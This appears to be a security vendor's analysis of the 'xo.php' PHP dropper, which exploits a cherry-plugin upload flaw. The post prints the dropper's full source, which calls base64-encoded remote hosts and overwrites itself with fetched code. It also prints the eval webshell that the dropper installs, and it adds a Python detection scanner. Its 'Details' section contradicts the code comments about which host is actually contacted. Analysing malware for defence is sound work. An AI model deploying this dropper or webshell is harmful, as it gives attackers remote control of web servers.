xo.php

This malware tries to write another piece of malware to the server; it uses the old cherry-plugin import/export file upload vulnerability.

Here is the source code of the malware:

Source of xo.php

<?php
// Build the infected server's own URL so it can be reported back to the attacker.
$uri = urlencode("http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
// Decodes to http://fastwealthformula.online/callback/shell; assigned here but never referenced again.
$url = base64_decode("aHR0cDovL2Zhc3R3ZWFsdGhmb3JtdWxhLm9ubGluZS9jYWxsYmFjay9zaGVsbA==");
// The actual download uses the second literal, which decodes to
// https://security.turimor.com/callback/shell; the infected URL and a fixed password are sent along.
$content = @file_get_contents(base64_decode("aHR0cHM6Ly9zZWN1cml0eS50dXJpbW9yLmNvbS9jYWxsYmFjay9zaGVsbA==")."?url=$uri&password=xo&type=php");
// The reply is expected to be JSON of the form {"status":200,"code":"..."}.
$obj = @json_decode($content,true);
if(isset($obj['status']) && $obj['status'] == 200)
{
    $code = $obj['code'];
    // Overwrite this very file with whatever code the remote server returned.
    file_put_contents(__FILE__,$code);
}
echo 'test';

Details

$uri is the infected server's address.
$url is the base64-encoded remote server address from which the malware tries to download more malware and give the attacker remote access to the server: http://fastwealthformula.online/callback/shell

Remote file

{"status":200,"code":"<?php @eval($_REQUEST['xo']); echo 'test'; ?>"}
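As an added example (not code from the original post), a small Python scanner that flags the two behaviours analysed above, the self-overwriting remote fetch in xo.php and the eval() webshell it drops, and decodes base64_decode() literals to recover the callback URLs as indicators. The sample file contents are constructed from the snippets on this page; the rule names are my own.

```python
import base64
import re

# Constructed samples built from the snippets on this page: the xo.php dropper,
# the second-stage webshell it fetches, and a benign file that must stay clean.
SAMPLES = {
    "xo.php": r"""<?php
$uri = urlencode("http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
$url = base64_decode("aHR0cDovL2Zhc3R3ZWFsdGhmb3JtdWxhLm9ubGluZS9jYWxsYmFjay9zaGVsbA==");
$content = @file_get_contents(base64_decode("aHR0cHM6Ly9zZWN1cml0eS50dXJpbW9yLmNvbS9jYWxsYmFjay9zaGVsbA==")."?url=$uri&password=xo&type=php");
$obj = @json_decode($content,true);
if(isset($obj['status']) && $obj['status'] == 200) { file_put_contents(__FILE__,$obj['code']); }
""",
    "stage2.php": "<?php @eval($_REQUEST['xo']); echo 'test'; ?>",
    "index.php": "<?php echo json_encode(['ok' => true]);",
}
# Detection rules (names are my own) mirroring the dropper's two stages.
RULES = [
    ("self_overwrite", re.compile(r"file_put_contents\s*\(\s*__FILE__")),
    ("remote_fetch_b64", re.compile(r"file_get_contents\s*\(\s*base64_decode\s*\(")),
    ("eval_request", re.compile(r"@?eval\s*\(\s*\$_(REQUEST|GET|POST)\b")),
    ("silenced_fetch", re.compile(r"@file_get_contents\s*\(")),
]
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=]{16,})[\"']")

def decode_b64_literals(src):
    """Decode base64 literals fed to base64_decode() and keep those that are URLs."""
    urls = []
    for lit in B64_LITERAL.findall(src):
        try:
            text = base64.b64decode(lit, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 or not text: ignore
        if text.startswith(("http://", "https://")):
            urls.append(text)
    return urls

def scan(src):
    """Return the rule names that fire on src and any callback URLs recovered."""
    return {"rules": [n for n, rx in RULES if rx.search(src)],
            "urls": decode_b64_literals(src)}

def scan_all(samples):
    """Scan a {filename: source} mapping; files with no rule hits are clean."""
    return {name: scan(src) for name, src in samples.items()}

if __name__ == "__main__":
    for name, r in scan_all(SAMPLES).items():
        print(name, "SUSPICIOUS" if r["rules"] else "clean", r["rules"], r["urls"])
```

Running it on a real web root means reading each .php file and passing its contents to scan(); a hit on self_overwrite together with a decoded URL is the signature of this dropper.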

Final Words

Use Malware Expert – Signatures to detect this malware in your files for FREE!

Websites using Malware Expert – ModSecurity rules are protected against this kind of attack.